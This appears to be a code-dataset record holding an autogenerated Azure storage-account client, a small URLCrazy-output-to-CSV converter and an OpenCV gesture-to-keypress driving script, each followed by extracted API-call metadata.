"""Returns the properties for the specified storage account including but
not limited to name, account type, location, and account status. The
ListKeys operation should be used to retrieve storage keys.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccount
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccount>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, account_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Updates the account type or tags for a storage account. It can also be
used to add a custom domain (note that custom domains cannot be added
via the Create operation). Only one custom domain is supported per
storage account. This API can only be used to update one of tags,
accountType, or customDomain per call. To update multiple of these
properties, call the API multiple times with one change per call.
This call does not change the storage keys for the account. If you
want to change storage account keys, use the RegenerateKey operation.
The location and name of the storage account cannot be changed after
creation.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param parameters: The parameters to update on the account. Note that
only one property can be changed at a time using this API.
:type parameters: :class:`StorageAccountUpdateParameters
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountUpdateParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccount
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccount>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'StorageAccountUpdateParameters')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_keys(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountKeys
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountKeys>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/listKeys'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccountKeys', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all the storage accounts available under the subscription. Note
that storage keys are not returned; use the ListKeys operation for
this.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountPaged
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/storageAccounts'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Lists all the storage accounts available under the given resource
group. Note that storage keys are not returned; use the ListKeys
operation for this.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountPaged
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def regenerate_key(
self, resource_group_name, account_name, key_name=None, custom_headers=None, raw=False, **operation_config):
"""Regenerates the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param key_name: Possible values include: 'key1', 'key2'
:type key_name: str or :class:`KeyName
<Fixtures.AcceptanceTestsStorageManagementClient.models.KeyName>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountKeys
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountKeys>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
regenerate_key = models.StorageAccountRegenerateKeyParameters(key_name=key_name)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/regenerateKey'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(regenerate_key, 'StorageAccountRegenerateKeyParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccountKeys', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| [
"uuid.uuid1",
"msrest.pipeline.ClientRawResponse",
"msrestazure.azure_exceptions.CloudError",
"msrestazure.azure_operation.AzureOperationPoller"
] | [((8938, 9063), 'msrestazure.azure_operation.AzureOperationPoller', 'AzureOperationPoller', (['long_running_send', 'get_long_running_output', 'get_long_running_status', 'long_running_operation_timeout'], {}), '(long_running_send, get_long_running_output,\n get_long_running_status, long_running_operation_timeout)\n', (8958, 9063), False, 'from msrestazure.azure_operation import AzureOperationPoller\n'), ((3908, 3928), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (3918, 3928), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((4227, 4268), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (4244, 4268), False, 'from msrest.pipeline import ClientRawResponse\n'), ((11743, 11763), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (11753, 11763), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((11906, 11939), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['None', 'response'], {}), '(None, response)\n', (11923, 11939), False, 'from msrest.pipeline import ClientRawResponse\n'), ((14907, 14927), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (14917, 14927), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((15213, 15254), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (15230, 15254), False, 'from msrest.pipeline import ClientRawResponse\n'), ((19188, 19208), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (19198, 19208), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((19494, 19535), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (19511, 19535), False, 'from msrest.pipeline import ClientRawResponse\n'), ((22210, 22230), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (22220, 22230), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((22520, 22561), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (22537, 22561), False, 'from msrest.pipeline import ClientRawResponse\n'), ((32054, 32074), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (32064, 32074), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((32364, 32405), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (32381, 32405), False, 'from msrest.pipeline import ClientRawResponse\n'), ((3214, 3226), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (3224, 3226), False, 'import uuid\n'), ((7121, 7133), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (7131, 7133), False, 'import uuid\n'), ((8192, 8212), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (8202, 8212), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((8526, 8567), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (8543, 8567), False, 'from msrest.pipeline import ClientRawResponse\n'), ((11202, 11214), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (11212, 11214), False, 'import uuid\n'), ((14374, 14386), 
'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (14384, 14386), False, 'import uuid\n'), ((18510, 18522), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (18520, 18522), False, 'import uuid\n'), ((21676, 21688), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (21686, 21688), False, 'import uuid\n'), ((25032, 25052), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (25042, 25052), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((28293, 28313), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (28303, 28313), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((31366, 31378), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (31376, 31378), False, 'import uuid\n'), ((24446, 24458), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (24456, 24458), False, 'import uuid\n'), ((27707, 27719), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (27717, 27719), False, 'import uuid\n')] |
from parsuite.core.argument import Argument
from parsuite import helpers
from parsuite.core.suffix_printer import *
from pathlib import Path
import xml.etree.ElementTree as ET
import argparse
import os
import re
help = 'Convert URLCrazy output to CSV'
args = [
Argument('--output-file', '-of', required=True,
help='Output file.')
]
ppat = prefix_pattern = re.compile('^(Bit Flipping|Character Insertion|Character Omission|'\
'Character Repeat|Character Replacement|Character Swap|Homoglyphs|Homophones|'\
'Missing Dot|Singular or Pluralise|Vowel Swap|Wrong TLD)')
def parse(input_file=None, output_file=None, **kwargs):
sprint('Parsing URLCrazy file')
output = ['"Typo Type","Typo","DNS-A","CC-A","DNS-MX","Extn"']
with open(input_file) as infile:
for line in infile:
if re.search(ppat,line):
output.append('"'+re.sub('\s{2,}','","',line.strip())+'"')
sprint('Writing output file')
with open(output_file,'w') as outfile:
for line in output:
outfile.write(line+'\n')
sprint('Done!')
return 0
| [
"re.search",
"parsuite.core.argument.Argument",
"re.compile"
] | [((371, 580), 're.compile', 're.compile', (['"""^(Bit Flipping|Character Insertion|Character Omission|Character Repeat|Character Replacement|Character Swap|Homoglyphs|Homophones|Missing Dot|Singular or Pluralise|Vowel Swap|Wrong TLD)"""'], {}), "(\n '^(Bit Flipping|Character Insertion|Character Omission|Character Repeat|Character Replacement|Character Swap|Homoglyphs|Homophones|Missing Dot|Singular or Pluralise|Vowel Swap|Wrong TLD)'\n )\n", (381, 580), False, 'import re\n'), ((267, 335), 'parsuite.core.argument.Argument', 'Argument', (['"""--output-file"""', '"""-of"""'], {'required': '(True)', 'help': '"""Output file."""'}), "('--output-file', '-of', required=True, help='Output file.')\n", (275, 335), False, 'from parsuite.core.argument import Argument\n'), ((838, 859), 're.search', 're.search', (['ppat', 'line'], {}), '(ppat, line)\n', (847, 859), False, 'import re\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
#Libraries
import cv2
import numpy as np
import pyautogui
import keyboard
# In[2]:
#Color to detect BGR
l = [17, 15, 100] #lower
u = [80, 76, 220] #upper
# In[3]:
#region coordinates
k_left, k_top, k_right, k_bottom = 640, 30, 440, 130
h_left, h_top, h_right, h_bottom = 440, 130, 240, 330
s_left, s_top, s_right, s_bottom = 840, 130, 640, 330
f_left, f_top, f_right, f_bottom = 640, 330, 440, 430
# In[4]:
#Key Pressed
current_key_pressed = set()
# In[5]:
#Accelerate
def up():
#print("W")
pyautogui.keyDown('up')
current_key_pressed.add('w')
# In[6]:
#Steering Right
def right():
#print("D")
pyautogui.keyDown('right')
current_key_pressed.add('d')
# In[7]:
#Steering Left
def left():
#print("A")
pyautogui.keyDown('left')
current_key_pressed.add('a')
# In[8]:
#Brakes
def down():
#print("S")
pyautogui.keyDown('down')
current_key_pressed.add('s')
# In[9]:
#Find contours
def findContours(image):
img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
threshold = cv2.threshold(img, 15, 255, cv2.THRESH_BINARY)[1]
(_, cnts, _) = cv2.findContours(threshold.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
return len(cnts)
# In[10]:
#Main function
if __name__=='__main__':
aWeight=0.5
cam=cv2.VideoCapture(0)
cam.set(3,1280)
cam.set(4,720)
cam.set(cv2.CAP_PROP_FPS,60)
while True:
buttonPressed = False
buttonPressed_leftright = False
status, frame = cam.read()
clone = frame.copy()
clone = cv2.flip(clone,1)
clone = cv2.resize(clone,(1280,720))
reg_up = clone[k_top:k_bottom, k_right:k_left]
reg_left = clone[h_top:h_bottom, h_right:h_left]
reg_right = clone[s_top:s_bottom, s_right:s_left]
reg_down = clone[f_top:f_bottom, f_right:f_left]
reg_up = cv2.GaussianBlur(reg_up, (7,7), 0)
reg_right = cv2.GaussianBlur(reg_right, (7,7), 0)
reg_left = cv2.GaussianBlur(reg_left, (7,7), 0)
reg_down = cv2.GaussianBlur(reg_down, (7,7), 0)
        # Convert the BGR colour bounds to uint8 arrays before thresholding
        l = np.array(l, dtype="uint8")
        u = np.array(u, dtype="uint8")
        hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv, l, u)
        mask = cv2.erode(mask, None, iterations=2)
        mask = cv2.dilate(mask, None, iterations=2)
mask_up = cv2.inRange(reg_up, l, u)
mask_right = cv2.inRange(reg_right, l, u)
mask_left = cv2.inRange(reg_left, l, u)
mask_down = cv2.inRange(reg_down, l, u)
out_up = cv2.bitwise_and(reg_up, reg_up, mask=mask_up)
out_right = cv2.bitwise_and(reg_right, reg_right, mask=mask_right)
out_left = cv2.bitwise_and(reg_left, reg_left, mask=mask_left)
out_down = cv2.bitwise_and(reg_down, reg_down, mask=mask_down)
cnts_up = findContours(out_up)
cnts_right = findContours(out_right)
cnts_left = findContours(out_left)
cnts_down = findContours(out_down)
if (cnts_up > 0):
up()
buttonPressed = True
elif (cnts_right > 0):
right()
buttonPressed = True
buttonPressed_leftright = True
elif (cnts_left > 0):
left()
buttonPressed = True
buttonPressed_leftright = True
elif (cnts_down > 0):
down()
buttonPressed = True
image_up = cv2.rectangle(clone, (k_left, k_top), (k_right, k_bottom), (255,0,255,0.5), 2)
image_left = cv2.rectangle(clone, (h_left, h_top), (h_right, h_bottom), (255,0,0,0.5), 2)
image_right = cv2.rectangle(clone, (s_left, s_top), (s_right, s_bottom), (0,0,255,0.5), 2)
image_down = cv2.rectangle(clone, (f_left, f_top), (f_right, f_bottom), (0,255,255,0.5), 2)
cv2.putText(image_up, "W", (k_left-170,k_top+110), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.putText(image_left, "A", (h_left-170,h_top+200), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.putText(image_right, "D", (s_left-170,s_top+200), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.putText(image_down, "S", (f_left-170,f_top+110), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.namedWindow("video",cv2.WINDOW_AUTOSIZE)
cv2.imshow("video", clone)
if not buttonPressed and len(current_key_pressed) != 0:
for key in current_key_pressed:
pyautogui.keyUp(key)
current_key_pressed = set()
if not buttonPressed_leftright and (('a' in current_key_pressed) or ('d' in current_key_pressed)):
if 'a' in current_key_pressed:
pyautogui.keyUp('left')
current_key_pressed.remove('a')
elif 'd' in current_key_pressed:
pyautogui.keyUp('right')
current_key_pressed.remove('d')
if cv2.waitKey(1) & 0Xff == ord('q'):
break
cam.release()
cv2.destroyAllWindows()
| [
"cv2.rectangle",
"cv2.imshow",
"numpy.array",
"cv2.destroyAllWindows",
"cv2.threshold",
"cv2.erode",
"cv2.waitKey",
"pyautogui.keyDown",
"cv2.putText",
"cv2.cvtColor",
"cv2.resize",
"cv2.GaussianBlur",
"cv2.namedWindow",
"cv2.flip",
"cv2.inRange",
"cv2.bitwise_and",
"cv2.VideoCapture... | [((566, 589), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""up"""'], {}), "('up')\n", (583, 589), False, 'import pyautogui\n'), ((685, 711), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""right"""'], {}), "('right')\n", (702, 711), False, 'import pyautogui\n'), ((805, 830), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""left"""'], {}), "('left')\n", (822, 830), False, 'import pyautogui\n'), ((917, 942), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""down"""'], {}), "('down')\n", (934, 942), False, 'import pyautogui\n'), ((1039, 1078), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (1051, 1078), False, 'import cv2\n'), ((1340, 1359), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1356, 1359), False, 'import cv2\n'), ((5079, 5102), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5100, 5102), False, 'import cv2\n'), ((1094, 1140), 'cv2.threshold', 'cv2.threshold', (['img', '(15)', '(255)', 'cv2.THRESH_BINARY'], {}), '(img, 15, 255, cv2.THRESH_BINARY)\n', (1107, 1140), False, 'import cv2\n'), ((1610, 1628), 'cv2.flip', 'cv2.flip', (['clone', '(1)'], {}), '(clone, 1)\n', (1618, 1628), False, 'import cv2\n'), ((1644, 1674), 'cv2.resize', 'cv2.resize', (['clone', '(1280, 720)'], {}), '(clone, (1280, 720))\n', (1654, 1674), False, 'import cv2\n'), ((1919, 1954), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_up', '(7, 7)', '(0)'], {}), '(reg_up, (7, 7), 0)\n', (1935, 1954), False, 'import cv2\n'), ((1974, 2012), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_right', '(7, 7)', '(0)'], {}), '(reg_right, (7, 7), 0)\n', (1990, 2012), False, 'import cv2\n'), ((2031, 2068), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_left', '(7, 7)', '(0)'], {}), '(reg_left, (7, 7), 0)\n', (2047, 2068), False, 'import cv2\n'), ((2087, 2124), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_down', '(7, 7)', '(0)'], {}), '(reg_down, (7, 7), 0)\n', (2103, 2124), False, 'import cv2\n'), ((2147, 2185), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (2159, 2185), False, 'import cv2\n'), ((2210, 2232), 'cv2.inRange', 'cv2.inRange', (['hsv', 'l', 'u'], {}), '(hsv, l, u)\n', (2221, 2232), False, 'import cv2\n'), ((2248, 2283), 'cv2.erode', 'cv2.erode', (['mask', 'None'], {'iterations': '(2)'}), '(mask, None, iterations=2)\n', (2257, 2283), False, 'import cv2\n'), ((2299, 2335), 'cv2.dilate', 'cv2.dilate', (['mask', 'None'], {'iterations': '(2)'}), '(mask, None, iterations=2)\n', (2309, 2335), False, 'import cv2\n'), ((2349, 2379), 'numpy.array', 'np.array', (['lower'], {'dtype': '"""uint8"""'}), "(lower, dtype='uint8')\n", (2357, 2379), True, 'import numpy as np\n'), ((2392, 2422), 'numpy.array', 'np.array', (['upper'], {'dtype': '"""uint8"""'}), "(upper, dtype='uint8')\n", (2400, 2422), True, 'import numpy as np\n'), ((2442, 2467), 'cv2.inRange', 'cv2.inRange', (['reg_up', 'l', 'u'], {}), '(reg_up, l, u)\n', (2453, 2467), False, 'import cv2\n'), ((2489, 2517), 'cv2.inRange', 'cv2.inRange', (['reg_right', 'l', 'u'], {}), '(reg_right, l, u)\n', (2500, 2517), False, 'import cv2\n'), ((2538, 2565), 'cv2.inRange', 'cv2.inRange', (['reg_left', 'l', 'u'], {}), '(reg_left, l, u)\n', (2549, 2565), False, 'import cv2\n'), ((2586, 2613), 'cv2.inRange', 'cv2.inRange', (['reg_down', 'l', 'u'], {}), '(reg_down, l, u)\n', (2597, 2613), False, 'import cv2\n'), ((2632, 2677), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_up', 'reg_up'], {'mask': 'mask_up'}), '(reg_up, 
reg_up, mask=mask_up)\n', (2647, 2677), False, 'import cv2\n'), ((2698, 2752), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_right', 'reg_right'], {'mask': 'mask_right'}), '(reg_right, reg_right, mask=mask_right)\n', (2713, 2752), False, 'import cv2\n'), ((2772, 2823), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_left', 'reg_left'], {'mask': 'mask_left'}), '(reg_left, reg_left, mask=mask_left)\n', (2787, 2823), False, 'import cv2\n'), ((2843, 2894), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_down', 'reg_down'], {'mask': 'mask_down'}), '(reg_down, reg_down, mask=mask_down)\n', (2858, 2894), False, 'import cv2\n'), ((3514, 3600), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(k_left, k_top)', '(k_right, k_bottom)', '(255, 0, 255, 0.5)', '(2)'], {}), '(clone, (k_left, k_top), (k_right, k_bottom), (255, 0, 255, \n 0.5), 2)\n', (3527, 3600), False, 'import cv2\n'), ((3614, 3693), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(h_left, h_top)', '(h_right, h_bottom)', '(255, 0, 0, 0.5)', '(2)'], {}), '(clone, (h_left, h_top), (h_right, h_bottom), (255, 0, 0, 0.5), 2)\n', (3627, 3693), False, 'import cv2\n'), ((3713, 3792), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(s_left, s_top)', '(s_right, s_bottom)', '(0, 0, 255, 0.5)', '(2)'], {}), '(clone, (s_left, s_top), (s_right, s_bottom), (0, 0, 255, 0.5), 2)\n', (3726, 3792), False, 'import cv2\n'), ((3811, 